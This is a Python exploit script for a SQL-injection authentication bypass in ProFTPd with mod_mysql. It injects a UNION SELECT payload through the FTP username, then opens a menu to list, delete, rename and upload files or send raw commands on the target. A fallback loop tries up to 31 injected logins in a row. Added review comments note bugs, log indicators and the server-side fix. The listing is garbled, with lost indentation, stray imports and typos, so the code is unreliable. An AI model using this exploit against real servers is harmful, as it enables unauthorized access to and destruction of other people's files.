- #!/usr/bin/python
- # -*- coding: utf-8 -*-
- ## --------------------------------------------------------------------
- ## ProFTPd with mod_mysql Authentication Bypass Exploit [PYTHON]
- ## Code By NqrK
- ## Powered By Python 2.6
- ##
- ##
- ## --------------------------------------------------------------------
- ## Class : Input Validation Error
- ## Remote: Yes
- ## Credit:
- ## Page :
- ##
- ##
- ##
- ## --------------------------------------------------------------------
- ## ProFTPd with mod_mysql is prone to an SQL-injection issue because it fails
- ## to sufficiently sanitize user-supplied data before using it in an SQL query.
- ## An attacker could use this to manipulate SQL queries,
- ## modify data, or exploit latent vulnerabilities in the underlying database.
- ## This may result in unauthorized access and a compromise of the application;
- ## other attacks are also possible.
- ## --------------------------------------------------------------------
- import os
- import sys
- import ftplib
- from ftplib import FTP
- from Xlib.protocol.structs import Host
- from __builtin__ import raw_input
- from twisted.protocols import ftp
- # Cosmetic console setup: sets the Windows console colour and window title via
- # os.system. The two messages in the except branch are plain prints; nothing
- # named "Unix_Kernel" is loaded or run anywhere in this listing.
- # NOTE(review): os.system reports a missing command through its return status
- # rather than by raising, so the except branch is presumably not what runs on
- # a non-Windows shell. Confirm against an intact copy.
- try:
- os.system('color 0a')
- os.system('title ProFTPd with mod_mysql Authetication Bypass Exploit')
- except:
- print("[!]You are in Unix, Change of exploit... [ok].")
- print("[+]Run modules Unix_Kernel..[RUN].\n")
- # Core(): interactive menu entered after the login call at the bottom of the
- # script returns without raising. Each menu entry wraps one ftplib call on the
- # module-level `ftp` connection, so the FTP verbs named in the comments below
- # are what a server-side command log would record for a session driven by this
- # script. `Host` is read from module scope and is used only in messages.
- # Every branch uses a bare `except:`, so the real ftplib error (permission
- # denied, timeout, ...) is discarded and only a generic message is printed.
- # NOTE(review): indentation was lost in this paste; the nesting described here
- # follows the if/elif/try keywords. Confirm against an intact copy.
- def Core():
- """
- """
- print("\n\t[!]Please Choose a Command To Execut On ", Host, "\n")
- print("[1] Show Files.")
- print("[2] Delete Files.")
- print("[3] Rename Files or Dir")
- print("[4] Create Directory")
- print("[5] Personnal Command")
- print("[6] Download Files")
- print("[7] Upload Files")
- print("[8] Change Directory")
- print("[9] Clear Console")
- print("[0] Show Menu")
- print("[E] Exit\n")
- # Command loop: runs until "E" is entered. The "root@cmd" prompt is a fixed
- # string and says nothing about the privileges of the FTP session.
- while (1):
- cmd = raw_input("root@cmd ~ #")
- if cmd == "1":
- print("[!]Listing File On Server : ", Host, "...\n")
- try:
- # Listing of the current remote directory (LIST), printed line by line.
- ftp.retrlines('LIST')
- print("[+]Listing File On", Host, "is SuccessFul !\n")
- except:
- print("[!] Cannot Listing File On", Host, "\n\a")
- elif cmd == "2":
- print("[!] Please Specify a File To Delete\n")
- try:
- File = raw_input("Remove File : ")
- # Remote delete (DELE) of the name typed at the prompt.
- ftp.delete(File)
- print("[+]File {", File, "} Deleted ! \n")
- except:
- print("[!] Cannot Deleting File On", Host, "\n\a")
- elif cmd == "3":
- print("[!] Please Speecify a File To Rename\n")
- try:
- File = raw_input("Rename File : ")
- Rename = raw_input("New Name : ")
- # Remote rename (RNFR followed by RNTO).
- ftp.rename(File, Rename)
- print("[+]File {", File, "} Renamed to {", Rename, "} \n")
- except:
- print("[!] Cannot Renamed File On", Host, "\n\a")
- elif cmd == "4":
- print("[!] Please Specify a Directory Name To create\n")
- try:
- DIR = raw_input("New Directory : ")
- # Remote directory creation (MKD).
- ftp.mkd(DIR)
- print("[+]Create a New Directory !\n")
- except:
- print("[!] Cannot Created DIR On", Host, "\n\a")
- elif cmd == "5":
- print("[!] Please Enter you Command :")
- print("[!] Enter ''/close'' for Exit Option\n")
- # Raw pass-through: whatever is typed is sent as-is on the FTP control
- # connection and the server's reply is printed. "/close" leaves this
- # inner loop and returns to the menu.
- while (1):
- perso_cmd = raw_input("root@server ~ # ")
- if perso_cmd == "/close":
- break
- else:
- try:
- request = ftp.sendcmd(perso_cmd)
- print(request)
- except:
- print("[!]Command not Found On ", Host, "\n\a")
- elif cmd == "6":
- print("[!] Please Specify a Files Name To Download\n")
- Rem_Files = raw_input("Download Files : ")
- try:
- # sendcmd only writes the text "GET <name>" to the control connection
- # and reads the reply; nothing is written to local disk by this call.
- # The "Downloaded" message is printed whenever the call does not raise.
- ftp.sendcmd('GET '+ Rem_Files)
- print("[+]File {", Rem_Files, "} Downloaded !\n")
- except:
- print("[!] Cannot Download Files On ", Host, "\n\a")
- elif cmd == "7":
- print("[!] Please Specify a Files Name To Upload\n")
- try:
- File = raw_input("Files : ")
- # The typed value is used both as the local path to read and as the
- # remote name in STOR. If storbinary raises, close() is skipped and
- # the local file handle is left open.
- upl = open(File, 'rb')
- ftp.storbinary('STOR '+File, upl)
- upl.close()
- print("[+]File {", File,"} Uploaded !\n")
- except:
- print("[!] Cannot Upload Files On ", Host, "\n\a")
- elif cmd == "8":
- print("[!] Please Specify a Directory Name To Changed\n")
- try:
- Dir = raw_input("Directory : ")
- # Change of remote working directory (CWD).
- ftp.sendcmd('CWD '+ Dir)
- print("[+]Directory : ", Dir, "\n")
- except:
- print("[!] Cannot Changed Directory On ", Host, "\n\a")
- elif cmd == "9":
- # Local console clear only; no FTP traffic is generated here.
- try:
- os.system('cls')
- except:
- os.system('clear')
- elif cmd == "0":
- # Re-prints the menu. The wording differs from the first copy above
- # (the title line and entry [4]).
- print("\n\t[!]Please Choose a Chommand To Execut On ", Host, "\n")
- print("[1] Show Files.")
- print("[2] Delete Files.")
- print("[3] Rename Files or Dir")
- print("[4] Create Files or Dir")
- print("[5] Personnal Command")
- print("[6] Download Files")
- print("[7] Upload Files")
- print("[8] Change Directory")
- print("[9] Clear Console")
- print("[0] Show Menu")
- print("[E] Exit\n")
- elif cmd == "E":
- # Clean session end (QUIT), then leave the command loop.
- ftp.quit()
- print("[!]Disconnection.....[ok].\a")
- print("[+]Unloading exploit....[ok].\a")
- print("Exit...[OUT].\a\n")
- raw_input("Press ENTER To Continue...")
- break
- # Brute(): fallback offered by the main flow at the bottom of the script when
- # its single login attempt raises. Prompts for a target (`go`) and defines the
- # nested helper brute(), which loops i over 0..30 and, for each i, opens a new
- # FTP connection to `go` and calls login() with a USER value that embeds SQL
- # text plus the loop index, and the fixed password "1". When login() does not
- # raise, it prints a message, lists the current directory and closes the
- # connection.
- # Detection: the pattern on the wire is a run of up to 31 logins from one
- # source, each on a fresh connection, whose USER field starts with `%')` and
- # contains `union select`; that is distinctive in FTP authentication logs and,
- # if enabled, in the SQL backend's query log.
- # NOTE(review): indentation was lost in this paste. The `brute()` call after
- # the "Auto-Restart" message may be a recursive restart inside the except
- # branch or the single call from Brute()'s body. Confirm against an intact copy.
- def Brute():
- print("\n\t=================================================")
- print("\t [+] Attempting User Directory Discover Via FTP")
- print("\t=================================================\n")
- go = raw_input("[*] Target Online : ")
- print("\n")
- def brute():
- for i in range(0, 31):
- try:
- username = "%') and 1 = 2 union select 1, 1uid, gid, homedir, shell from ftpuser LINIT "+str(i) +",1; --"
- password = str("1")
- ftp = FTP(go)
- ftp.login(username, password)
- print("\n\a\t[+] Logged in as user "+ str(i) +",1")
- ftp.retrlines('LIST')
- ftp.close()
- # Bare except: connection errors and rejected logins are not told apart,
- # and a connection opened above is not closed on this path.
- except:
- print("[!] Invalid USER ["+str(i)+"] number On ", go, "....Auto-Restart BruteForcer.")
- brute()
- print("\n[$] Brute-Force Finished..\n")
- raw_input()
- # Main flow: print a banner, prompt for a target, open an FTP connection and
- # make one login attempt whose USER value is the SQL-bearing string in `user`,
- # with the fixed password "1". If login() returns without raising, the
- # interactive menu in Core() is started; otherwise the user is offered Brute().
- # Defensive reading: the header describes the flaw as the server building an
- # SQL query from unsanitized user data, so the fix is on the server side (a
- # ProFTPD/mod_sql build that escapes the USER value). A USER field containing
- # `%')` or `union select` in FTP logs is the indicator this script produces.
- # NOTE(review): indentation was lost in this paste; the try/except pairing
- # described in the comments below is inferred from keyword order. Confirm.
- print("")
- print("\t=========================================================")
- print("\t[+] ProFTPd with mod_mysql Authentication Bypass Exploit")
- print("\t[+] Credits Go For NqrK For Finding The Bug !")
- print("\t [+]Exploited By NqrK")
- print("\t [+]Forum.pr0ceed.net")
- print("\t=========================================================\n\a")
- user = "%') and 1=2 union select 1, 1uid, gid, homedir, shell from ftpuser, --"
- passwd = "1"
- # From here on `Host` is the typed target string; it replaces the `Host` name
- # imported from Xlib at the top of the file.
- Host = raw_input(" [*]Target: ")
- print("\n\a [!] Attacking ", Host, "...\n")
- try:
- print("[+]Conneect to host [waiting please]...\n\a")
- # Rebinds `ftp` (imported from twisted above) to the ftplib connection object
- # that Core() uses.
- ftp = FTP(Host)
- print("[+]Connected to ", Host, "\n\a")
- try:
- print("[+]loading exploit...Attacking..[Waiting Please]. \n")
- ftp.login(user, passwd)
- try:
- # The "successful" messages are printed whenever login() did not raise;
- # nothing further is checked before Core() is entered.
- print("[+]Attacking succeessful !\n\a")
- print("[+]Exploit PWNED The Machine : ", Host, " Enter in Matrix...\a\n")
- Core()
- # sys.exit() raises SystemExit, which a bare except also catches, so the
- # "END" message below is presumably printed on a normal return from Core().
- sys.exit()
- except:
- print("[!]END ProFTPd with mod_mysql Authentication Bypass Exploit in Python 3.5 By NqrK\n\a")
- # Presumably pairs with the try around login(): any exception raised there,
- # not only a rejected login, leads to the Brute() prompt.
- except:
- print("[!] Couldn't ByPass The authentication !\a\n")
- print("\n[+] Attempting User Directory Discover Via FTP [+]\n ")
- choice = raw_input("(yes)/(no): ")
- if choice == "yes":
- Brute()
- else:
- pass
- # Presumably the outermost handler: reached when FTP(Host) itself fails.
- except:
- print("[!] Cannot connect to ", Host, "\n\a")
- raw_input()
- ##END